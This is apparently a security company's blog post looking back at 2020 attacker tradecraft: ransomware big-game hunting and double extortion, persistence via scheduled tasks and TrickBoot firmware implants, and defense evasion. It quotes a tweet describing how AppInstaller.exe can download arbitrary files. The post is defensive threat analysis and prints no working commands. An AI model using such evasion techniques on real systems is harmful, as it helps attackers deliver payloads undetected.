As the year-that-must-not-be-named comes to a close, we’ve decided to take a look back at some of the more interesting — and innovative — hacker tradecraft we saw over these past 12 months.
We also covered this topic on our most recent Tradecraft Tuesday episode — go give it a watch if you’d prefer to recap the year via video. Otherwise, keep reading for the top tactics, techniques and procedures (TTPs) that captured our attention in 2020!
It’s no secret that this year has brought its changes — but it has also brought some of the same old TTPs we’ve always seen, just with different actors. And that’s important to call out because if you don’t protect yourself from what’s stayed the same, you’ll probably get pwned by the things that have changed.
In the spirit of old vs. new, let’s dive into what has (or has not) evolved when it comes to these threats and tradecraft.
Hackers Get More Tactical with Ransomware
If you’re a hacker in 2020, ransomware is truly one of the basic gifts that keeps on giving. The beginning of this year started right after the peak of when MSPs and their tools were being targeted by ransomware campaigns. 2019 was a ruthless year for MSPs because you were being weaponized by hackers to distribute ransomware to your client base. We even uncovered how one criminal attempted to sell access to an MSP on the dark web!
But as the year progressed, these ransomware incidents involving MSPs started to trend slightly downward. Don’t get me wrong, attackers were still using ransomware to monetize their attacks, but MSPs were no longer the target du jour.
This year, we saw attackers shift their focus to more high-value victims in what’s known as “big-game hunting.” Essentially, adversaries set their sights on targets where the likelihood of a large payout is higher — like back in June when several Fortune 500 companies were targeted, or in October when the victims were hospitals and healthcare providers.
Another major change when it came to ransomware was when it was used in the attack cycle. Back in 2019, we’d typically see that as soon as an attacker gained initial access and made their way in, they would immediately drop the ransomware or their choice and the encryption would happen within a few minutes.
More recently, attackers have been taking a bit longer to initiate the encryption and start the ransom. Instead, they’re maintaining a foothold, performing their enumeration and poking around more. Once they get onto a machine, they’ll start looking at what’s on that machine, what they have access to, what data is available and whether they’ve hit a target who could pay a lot. Basically, they’re finding the goods, downloading them and then starting the encryption. Why? Because now they have leverage for yet another trend that has emerged more and more this year: double extortion.
Double extortion is a cruel one-two punch. The first extortion happens when the hacker encrypts your files and you have to pay up to get access back. But then they hit you with, “we have a copy of your files and we’re either going to sell it, disclose it or tell auditors you’ve been compromised unless you pay us again.”
And to add insult to injury, attackers have caught on to the fact that successful double extortion means finding and destroying any backups you may have — so some are specifically targeting the servers where the backups are to remove that recovery option.
Persistence: Piling on the Indirection
Persistence is an adversary just trying to maintain their foothold. As we hinted at earlier, attackers are establishing persistence so they can silently snoop around a machine before they drop ransomware or take another action. And when it comes to persistence, the tried-and-true methods are still the most common.
We’re still seeing just as many scheduled tasks, services, shortcuts in the startup folder and other footholds like the ones we covered in our Tradecraft Tuesday episode dedicated to persistence. But hackers are piling on more layers of obfuscation and indirection — such as running a batch file from a VBScript that then calls the actual payload. It’s the same technique but with just enough obfuscation to get around being found.
To stay in the fight, attackers are constantly looking for ways to expand their foothold. We actually saw this recently with TrickBot unleashing a new functionality designed to inspect the UEFI/BIOS firmware of targeted systems, which was dubbed TrickBoot. This new functionality is like persistence for your persistence. If write capabilities are available, TrickBoot has the opportunity to implant UEFI/BIOS persistence, adding the ability to reinfect the device even after an OS wipe.
This just goes to show the lengths that attackers are taking to adapt their persistence efforts and hide in plain sight in order to evade detection… which brings us to our next section.
Defense Evasion: Same Game, Different Players
Defense evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Simply put: the adversary is trying to avoid being detected.
Over the course of 2020, defense evasion both stayed the same and changed. It stayed the same in the sense of how attackers are using it — avoiding detection by hiding in trusted processes, using legitimate applications to obfuscate malicious scripts, and disabling security software, among other things. But it’s also changed in a way because attackers continue to swap around and find different applications to use in their evasion.
Take App Installer, for example. Twitter user @notwhickey found that he was actually able to use App Installer to download a file from Pastebin and then go and execute it.
I found a way to download arbitrary files with AppInstaller.exe (signed by MS).— ¬ whickey (@notwhickey) December 1, 2020
`start` calls the default URI handler, spawns AppInstaller.exe, and downloads an arbitrary file which you can find using forfiles.#lolbin #lolbas #appinstaller pic.twitter.com/JoLvjLi7Ld
Attackers are constantly using techniques like this and adapting their tactics to confuse and bypass security products. But the silver lining is that now operating systems are building in mechanisms to keep up to date or help mitigate some of these attacks.
• • •
Year after year, attackers have shown us how they continue to learn and mature (and some are even starting to combine forces). For us defenders, we have to respond by continuing to solve these problems as a community, leveling up our cybersecurity knowledge and evolving ahead of the threats around us.
So, what will 2021 have in store for us? After this year, it’s hard to tell — but one thing we do know is that as long as hackers keep hacking, we’ll keep hunting.